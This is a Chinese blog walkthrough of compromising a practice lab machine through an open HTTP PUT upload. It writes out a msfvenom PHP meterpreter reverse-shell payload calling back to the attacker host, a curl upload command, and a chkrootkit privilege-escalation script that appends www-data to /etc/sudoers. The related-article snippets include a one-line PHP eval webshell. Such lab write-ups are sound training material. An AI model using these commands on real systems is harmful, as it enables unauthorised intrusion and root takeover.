web靶机系列-put上传

最新推荐文章于 2023-04-25 15:52:21 发布
最新推荐文章于 2023-04-25 15:52:21 发布
阅读量426 收藏
点赞数
文章标签: shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/106398908
版权

主机:192.168.136.133
靶机:192.168.136.140
用namp扫描靶机地址
在这里插入图片描述
发现开放80、22端口,用dirb、nikto扫描,没有发现可用的漏洞,扫描只有一个网址可以进入http://192.168.136.140/test/
在这里插入图片描述
在这里插入图片描述
测试一下是否存在PUT漏洞,发现有put漏洞
在这里插入图片描述
发现存在PUT方法
用 /usr/share/webshells/php 目录下php-reverse-shell.php,上传上去
火狐的RESTClient可用,可以PUT,但不能直接传文件,但可以选择类型,把生成的reverse_shell代码复制进去上传
在这里插入图片描述
监听端口,反弹shell(注:换成其他高位端口不能监听成功,防火墙过滤掉了)
在这里插入图片描述
优化终端python -c “import pty;pty.spawn(’/bin/bash’)”
在这里插入图片描述

构造payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.136.133 LPORT=443 > shell_443.php
在这里插入图片描述
将shell_55555上传到靶机的test目录下;
curl -v -H “Expect:” -T shell_443.php http://192.168.136.140/test/
在这里插入图片描述
在这里插入图片描述
在Kali测试机上打开msfconsole,exploit/multi/handler模块,指定IP和端口进行监听,然后放到后台
在这里插入图片描述
设置参数
在这里插入图片描述
访问shell_443.php
在这里插入图片描述
即可触发服务器端反弹TCP的操作, 在msfconsole里就会得到一个meterpreter的shell。
在这里插入图片描述
在meterpreter中用shell命令来得到一个交互式的shell,但是并没有tty,需要用python生成一个bash。
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
查看靶机服务器和版本信息;
在这里插入图片描述
扫描版本的漏洞
在这里插入图片描述
利用这个/usr/share/exploitdb/exploits/linux/local/38775.rb
在这里插入图片描述
在这里插入图片描述
可以看到chkrootkit存在本地提权漏洞

第一种添加当前用户www-data到sudoers列表中
新建一个文件update
在这里插入图片描述
给文件添加执行权限
在这里插入图片描述
添加当前用户www-data到sudoers列表中;
echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL)NOPASSWD:ALL” >> /etc/sudoers’ > /tmp/update
在这里插入图片描述

0x 0101
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之BTRSys v2.1 靶机渗透(wordpress 404页面上传webshell
afei001
04-02 1204
练习环境     攻击机:kali     靶机:BTRSys: v2.1 下载地址:https://download.vulnhub.com/btrsys/BTRSys2.1.rar 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500...
ms08067web-PUT
BROTHERYY的博客
09-28 287
使用burp修改为PUT方式,并传递参数 将得到的base64解密得到flag MS08067{76097a2f47164aedb5744854021d1eba} 也可以用python脚本来实现 import base64 import requests url = 'http://106.52.110.188:21028/' r = requests.session() a = r.put(url=url,data='MS08067') base= base64.b64decode(a.conte.
网络安全笔记-WebShell与文件上传
L120305q的博客
08-17 2896
网络安全笔记-WebShell与文件上传
Web Api其中的PUT功能演示
weixin_34289454的博客
03-18 101
Insus.NET这几天均在学习Web API知识,并练习。怎样获取数据,提交数据或是保存数据。你可以温习一下《Post model至Web Api创建或是保存数据》http://www.cnblogs.com/insus/p/4343833.html 和《添加JSON Data到已经存在的JSON文件中》http://www.cnblogs.com/insus/p/4344547.html ,这...
文件上传之中间件PUT上传
qq_42404383的博客
10-16 1332
中间件PUT上传 漏洞说明 中间件包括apache,tomcat,iis,weblogic等,这些中间件可以设置支持http方法。(HTTP方法包括GET,POST,HEAD,DELETE,PUT,OPTINOS等)每一个HTTP方法有对应的功能,在这些方法中,put可以直接从客户机上传文件到服务器上如果中间件开放了http的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应目录直接上传webshell,也从侧面反映了PUT漏洞的严重危害性。 渗透攻击 1.信息收集 扫描主机开放全部端口n
部署-阿里云服务器搭建靶机教程-2020.8.18.docx
08-24
Apache ActiveMQ 中的 fileserver 服务允许用户通过 HTTP PUT 方法上传文件到指定目录。Fileserver 支持写入文件(不解析 jsp),但是支持移动文件(Move)。攻击者可以将 jsp 文件上传到 Fileserver 下,然后再通过...
靶机测试--SickOs1.2【PUT漏洞】
ximo的博客
04-04 340
目录PUT漏洞信息收集漏洞利用反弹shell提权 PUT漏洞 通过PUT请求方式,上传文件。 参考链接:https://www.cebnet.com.cn/20180810/102513443.html 信息收集 主机发现: 端口扫描: 目录扫描: 漏洞利用 一、探测服务器是否开启PUT方式 burpsuite探测 二、上传文件 1.burpsuite上传: 修改为PUT方式,并在存在PUT漏洞的的目录下创建文件及文件内容。 查看目录: 执行命令: 2.curl 命令上传: curl -i -
CTF-PUT上传漏洞【超详细】
墨鱼菜鸡
09-10 217
目录 中间件PUT漏洞介绍 实验环境 信息探测 nmap -sV 192.168.20.137 nmap -A -v -T4 192.168.20.137 探测敏感信息 深入挖掘 漏洞扫描 测试PUT漏洞 对敏感目录进行测试 上传webshell 调用kali中的php 编辑shell.php 目录上传shell.php n...
Hackmyvm综合靶机 | Driftingblues-4
IerkeU的博客
04-11 1871
Driftingblues-4靶机过程记录
SickOS靶机——PUT方式上传漏洞、版本提权
KUKULI233的博客
12-22 923
主机发现 扫描端口 扫描端口服务 上了一下网站,发现并没有什么可用信息 查找网站目录 查找网站目录 发现test下有文件 尝试看看此网页有没有PUT方法 Burp抓包修改GET为OPTIONS 发现有PUT方法 在请求头中输入PUT /test/hahaha.php HTTP/1.1,这将会通过PUT请求上传hahaha.php文件到test目录下,然后在请求体中粘贴一下恶意代码。  ...
WEB-PUT练习
摘星怪sec的blog
04-25 231
可以看出,第三个路由是一个秘密路由,只有当请求方法为 PUT 并且路径为 "/super-secret-route-nobody-will-guess" 时才能访问。这可能是一个漏洞,因为未对该路由进行身份验证或授权检查,攻击者可以通过篡改 HTTP 请求来绕过安全控制,获取敏感信息或执行恶意操作。路由:使用 PUT 方法打开名为 "flag" 的文件并将其中的内容返回给客户端。用bp抓包,改一下请求方式,然后改文件路径在发包,就返回falg了。方法可以用于上传或更新文件,也可以用于创建新的资源。
CTF-PUT上传漏洞
不知名白帽的博客
05-27 771
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
Nikto
zhaji001
12-19 560
简介 https://cirt.net/ https://github.com/sullo/nikto 攻击机:kali linux 靶机: bee-box 扫描服务器 nikto -h 192.168.1.106 #在没指定端口的情况下它会默认的扫描80 nikto -h 192.168.1.106 -p 443 #指定端口 指定为范围(80-90)或逗号分隔列表(80,88,9...
JavaWeb - HTTP 请求中 Post 和 Put 区别
牧码的博客
12-04 2217
put 和 post 的技术实现上应该是没有很大区别的。但在于协议上语义是很大区别。 那么区别是什么? 首先,HTTP协议使用的是URI,是一种表示资源标志,那么对应的HTTP Verb就是各种对资源的操作,GET,PUT,DELETE等,明确这些,再往下看。 PUT:client对一个URI发送一个Entity,服务器在这个URI下如果已经又了一个Entity,那么此刻服务器应该替换成...
中间件put上传漏洞
Vinson的博客
10-04 3207
中间件包括apache,tomcat,lls,weblogic等,可以设置支持的http方法(get,post,head, delete, put, options) 每个http方法都有其对应功能,put 可以直接从客户机上传到服务器,如果中间件开放了Http中的put方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录 测试put漏洞 对敏感目录进行测试 curl -v...
上传webshell(入侵目标页面主机靶机演示)
weixin_45571987的博客
09-14 2171
上传webshell新手演示写好一句话木马寻找页面上传点(上传木马)寻找上传后的文件位置(绝对路径)连接上目标主机找到目标flag 写好一句话木马 <?php eval(@$_POST['shell']); ?> webshell的分类 ①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:jsp、asp、aspx、php 写成php形式 寻找页面上传点(上传木马) 在上一篇内容中我们知道了如何用sqlmap注入获取后台的账号密码,登录
WEBshell与文件上传漏洞
LJH1999ZN的博客
02-19 4792
一、文件上传漏洞的原理 如果web应用程序对上传文件的安全性没有过滤和校验,攻击者可以通过上传webshell恶意文件对服务器进行攻击 。 二、文件上传的原理 1.有文件上传功能 2.上传文件的目录能解析脚本文件 3.能访问到上传的文件 三、文件上传攻击 文件上传防护和绕过手段 1.文件上传漏洞--绕过前端js检测 由于网站客户端对文件的上传类型做了限制,不允许我们上传.php文件,我们可以通过bp抓取发送数据包,然后将数据包做改变即可 ...
webapi中put、get、post、delete的用法
自我修炼之路
03-30 5115
点击打开链接
WebApi--Put类型调用接口上传文件
shghdgdd的博客
06-04 568
最近在写webapi,遇到了一些比较难解决的问题,记录下来 我这里有一个PUT接口,是用来上传文件用的 放些头部参数 下面就是代码部分 string serviceUrl = "http://123.233.23.22:9090/esignpro/rest/filemanage/getUploadUrl";//接口地址 //创建Web访问对象 HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(serviceUrl);
vulnhub靶机系列
最新发布
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值